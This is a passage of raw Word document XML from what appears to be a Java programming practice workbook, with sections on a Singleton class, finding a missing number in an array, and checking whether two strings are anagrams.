        <w:t xml:space="preserve"> – Singleton class</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p w14:paraId="378025A5" w14:textId="260B9540" w:rsidR="00E56884" w:rsidRPr="00CE4B95" w:rsidRDefault="00986F7F" w:rsidP="00E56884">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="005D3B80" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to implement Singleton class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30EA08" w14:textId="784C759D" w:rsidR="00E56884" w:rsidRPr="00CE4B95" w:rsidRDefault="00E56884">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EEF78D"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89BC726"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B33B7FF"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tep 1: Create a private static instance of the class (initially null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A269E83"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BB839"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF711C4"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tep 2: Private constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07714261"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F0C433B"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ingleton instance created."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347BE68E"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048B14D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC69709"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tep 3: Public static method to provide access to the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D19BA"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ynchronize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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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5F0A5CC"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nstanc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C1569EA"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xml:space="preserve">            instanc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e only if not created yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8CF193"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61C7DC0"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instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11176D"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0BC80ED"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAACC9"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ample method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B366B2"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showMess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D77A60A"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ello from Singleton!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62298C59"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EFA0D71"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2A376"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6A59FA3"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA0BC7"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xml:space="preserve">        obj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howMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2A9C8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC84B59"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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et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Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF928A"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ame instance?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obj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obj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rue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A57FB1" w14:textId="77777777"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343110E" w14:textId="5F86A82B" w:rsidR="00014FC0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54990EC9" w14:textId="77777777" w:rsidR="00014FC0" w:rsidRPr="00CE4B95" w:rsidRDefault="00014FC0" w:rsidP="00014FC0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22757B62" w14:textId="01CC1402" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="314" w:name="_Toc196307794"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00EB6347" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find missing number from array</w:t>
      </w:r>
      <w:bookmarkEnd w:id="314"/>
    </w:p>
    <w:p w14:paraId="6D28B7E5" w14:textId="77777777" w:rsidR="00BC6AC9" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7" w:rsidP="00BC6AC9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Problem Definition:</w:t>
      </w:r>
      <w:r w:rsidR="00BC6AC9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write a program - method to return missing number from array of length n=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B2CD4" w14:textId="468C49D1" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC6AC9" w:rsidP="00BC6AC9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example: n=3, [2,0,3] -&gt; Output -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C38CC5" w14:textId="1A0DBE0A" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642E9FD5" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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issingNumberFind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BB6AD61" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A265DDE" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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findMissingNumber</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CEC02C4" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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expectedS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p>
    <w:p w14:paraId="5532C902" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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actualS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18562739" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B72D9" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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9E1D110" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            actualS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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171E31AD" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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C646BAC" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33839DAC" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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expectedS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ctualSum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B449072" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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06651C2" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B7258" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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F3E5EFA" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="46CE81D3" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="7B574FCB" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D1E46" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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missing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indMissingNumb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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F4344" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Missing number is: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iss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 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE44764" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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1DF662B" w14:textId="0CF97E53" w:rsidR="00121F47" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1DDCC1" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95" w:rsidRDefault="00121F47" w:rsidP="00121F47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F875735" w14:textId="61F8604A" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc196307795"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00653D81" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Anagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p w14:paraId="2BCB001A" w14:textId="77777777" w:rsidR="006E2279" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7" w:rsidP="006E2279">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="006E2279" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a program in java to check if two strings are Anagram or not. Return boolean method </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571E38F" w14:textId="40AAF929" w:rsidR="006E2279" w:rsidRPr="00CE4B95" w:rsidRDefault="006E2279" w:rsidP="006E2279">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>LISTEN - SILENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56294B91" w14:textId="5D33E2D4" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="006E2279" w:rsidP="006E2279">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Implement using collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0944E62D" w14:textId="20E38B1F" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D00172C"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p>
    <w:p w14:paraId="2785B167"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF37BA8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDBC18E"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nagram</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29D6983"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE5830F"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checkAnagramUsingArray</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tr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tr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EE1A053"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str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placeAll</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D0941A"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str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placeAll</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE7E57"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8D1A1BB"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0D363969"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44526A4"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ha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1Arra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LowerCas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CharArray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE855F2"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ha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2Arra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LowerCas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CharArray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35DBD6"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or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1Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F800E"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or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2Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B204E5C"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qual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1Arr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2Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316AFEE2"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0C0E74F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3376BF48"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checkAnagramUsingCollectio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tr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tr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D94F11D"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str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placeAll</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2DC13"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str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placeAll</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1862A"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CB4DB1D"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2146C9EB"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3BD02CE"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Charac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hm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Charac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p>
    <w:p w14:paraId="752168C8"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Charac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hm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Charac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p>
    <w:p w14:paraId="1DBDB998"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ha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1Arra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CharArray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285B64B"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ha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2Arra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CharArray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF05F5"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cha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alu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1Arr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B845003"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hm1</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valu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DFE4BEB"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hm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valu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4FB3657D"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ls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04954A3"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c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hm1</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value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0840BE18"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hm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valu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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C96022"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679C1C7"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80BEFCB"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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2Arr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CFB2C4B"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hm2</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ADF0227"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hm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186261E5"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ls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1524BDC"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hm2</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w:t>
